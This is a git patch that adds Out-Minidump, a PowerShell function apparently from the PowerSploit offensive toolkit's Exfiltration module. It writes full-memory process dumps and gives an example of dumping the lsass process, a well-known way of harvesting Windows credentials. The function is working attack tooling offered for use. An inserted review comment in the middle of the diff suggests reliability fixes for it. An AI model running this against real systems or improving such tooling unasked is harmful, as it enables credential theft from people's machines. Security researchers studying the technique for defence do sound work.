From af04f7e52838f88069eaaad12b831a4af4a28091 Mon Sep 17 00:00:00 2001
From: Matt Graeber
Date: Wed, 15 May 2013 20:54:16 -0400
Subject: Added Out-Minidump

Out-Minidump writes a process dump file with all process memory to disk. This is similar to running procdump.exe with the '-ma' switch.
---
Exfiltration/Exfiltration.psd1 | 3 +-
Exfiltration/Out-Minidump.ps1 | 133 +++++++++++++++++++++++++++++++++++++++++
README.md | 4 ++
3 files changed, 139 insertions(+), 1 deletion(-)
create mode 100644 Exfiltration/Out-Minidump.ps1

diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1
index 7eb9aa2..7c65566 100644
--- a/Exfiltration/Exfiltration.psd1
+++ b/Exfiltration/Exfiltration.psd1
@@ -73,7 +73,8 @@ AliasesToExport = ''
 ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
 
 # List of all files packaged with this module
-FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'
+FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
+ 'Usage.md'
 
 # Private data to pass to the module specified in RootModule/ModuleToProcess
 # PrivateData = ''
diff --git a/Exfiltration/Out-Minidump.ps1 b/Exfiltration/Out-Minidump.ps1
new file mode 100644
index 0000000..b89f3dc
--- /dev/null
+++ b/Exfiltration/Out-Minidump.ps1
@@ -0,0 +1,133 @@
+function Out-Minidump
+{
+<#
+.SYNOPSIS
+
+ Generates a full-memory minidump of a process.
+
+ PowerSploit Function: Out-Minidump
+ Author: Matthew Graeber (@mattifestation)
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+
+.DESCRIPTION
+
+ Out-Minidump writes a process dump file with all process memory to disk.
+ This is similar to running procdump.exe with the '-ma' switch.
+
+.PARAMETER Id
+
+ Specifies the process ID of the process for which a dump will be generated.
+
+.PARAMETER DumpFilePath
+
+ Specifies the path where dump files will be written. By default, dump files
+ are written to the current working directory. Dump file names take following
+ form: processname_id.dmp
+
+.EXAMPLE
+
+ Out-Minidump -Id 4293
+
+ Description
+ -----------
+ Generate a minidump for process ID 4293.
+
+.EXAMPLE
+
+ Get-Process lsass | Out-Minidump
+
+ Description
+ -----------
+ Generate a minidump for the lsass process. Note: To dump lsass, you must be
+ running from an elevated prompt.
+
+.EXAMPLE
+
+ Get-Process | Out-Minidump -DumpFilePath C:\temp
+
+ Description
+ -----------
+ Generate a minidump of all running processes and save them to C:\temp.
+
+.INPUTS
+
+ System.Diagnostics.Process
+
+ You can pipe a process object to Out-Minidump.
+
+.OUTPUTS
+
+ None
+
+.LINK
+
+ http://www.exploit-monday.com/
+#>
+
+ [CmdletBinding()]
+ Param (
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
+ [ValidateScript({ Get-Process -Id $_ })]
+ [UInt16[]]
+ $Id,
+
+ [Parameter(Position = 1)]
+ [ValidateScript({ Test-Path $_ })]
+ [String]
+ $DumpFilePath = $PWD
+ )
+
+ BEGIN
+ {
+ $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
+ $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
+ $Flags = [Reflection.BindingFlags] 'NonPublic, Static'
+ $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
+ $MiniDumpWithFullMemory = [UInt32] 2
+ }
+
+ PROCESS
+ {
+ foreach ($ProcessId in $Id)
+ {
+ $ProcessInfo = Get-Process -Id $ProcessId
+ $ProcessName = $ProcessInfo.Name
+ $ProcessHandle = $ProcessInfo.Handle
+ $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
+
+ $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
+
+ $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
+
+ $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
+ $ProcessId,
+ $FileStream.SafeFileHandle,
+ $MiniDumpWithFullMemory,
+ [IntPtr]::Zero,
+ [IntPtr]::Zero,
+ [IntPtr]::Zero))
+
+ $FileStream.Close()
+
+ if (-not $Result)
+ {
+ $Exception = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()
+ $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
+
+ # Remove any partially written dump files. For example, a partial dump will be written
+ # in the case when 32-bit PowerShell tries to dump a 64-bit process.
+ Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
+
+ throw $ExceptionMessage
+ }
+ else
+ {
+ Write-Verbose "Success! Minidump written to $ProcessDumpPath."
+ }
+ }
+ }
+
+ END {}
+}
\ No newline at end of file
diff --git a/README.md b/README.md
index 89ecb42..54f7997 100644
--- a/README.md
+++ b/README.md
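Review bot: `$FileStream.Close()` is skipped whenever `$MiniDumpWriteDump.Invoke(...)` throws (an argument-type mismatch, or a native failure surfaced as a wrapped TargetInvocationException), so the open handle on the dump file is leaked and a zero-length or partial file is left on disk that the `Remove-Item` cleanup further down never reaches; wrap the call as `try { $Result = $MiniDumpWriteDump.Invoke($null, @(...)) } finally { $FileStream.Close() }` and keep the `-not $Result` handling after it. BEGIN also assumes the reflection lookups succeed: `$WER`, `$WERNativeMethods` and `$MiniDumpWriteDump` are never null-checked, and because they resolve a non-public nested type inside System.Management.Automation, a PowerShell build that lacks it fails later in PROCESS with an opaque null-method error; `if ($null -eq $MiniDumpWriteDump) { throw 'MiniDumpWriteDump is not available in this PowerShell build.' }` at the end of BEGIN gives a clear diagnostic. The `GetLastWin32Error()` read after `Invoke` is only meaningful if that internal DllImport was declared with SetLastError=true, which the hunk cannot show, so the text placed in `$ExceptionMessage` may be stale; this is worth confirming and recording in a comment on the `$Exception` line. The `.OUTPUTS` help could also state that a failed dump terminates the pipeline via `throw`, since the third example pipes every process and a reader would otherwise expect the remaining processes to be attempted.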
@@ -128,6 +128,10 @@ Locates single Byte AV signatures utilizing the same method as DSplit from "clas
 
 A function that takes screenshots at a regular interval and saves them to a folder.
 
+#### `Out-Minidump`
+
+Generates a full-memory minidump of a process.
+
 ## Recon
 
 **Tools to aid in the reconnaissance phase of a penetration test.**
-- 
cgit v1.2.3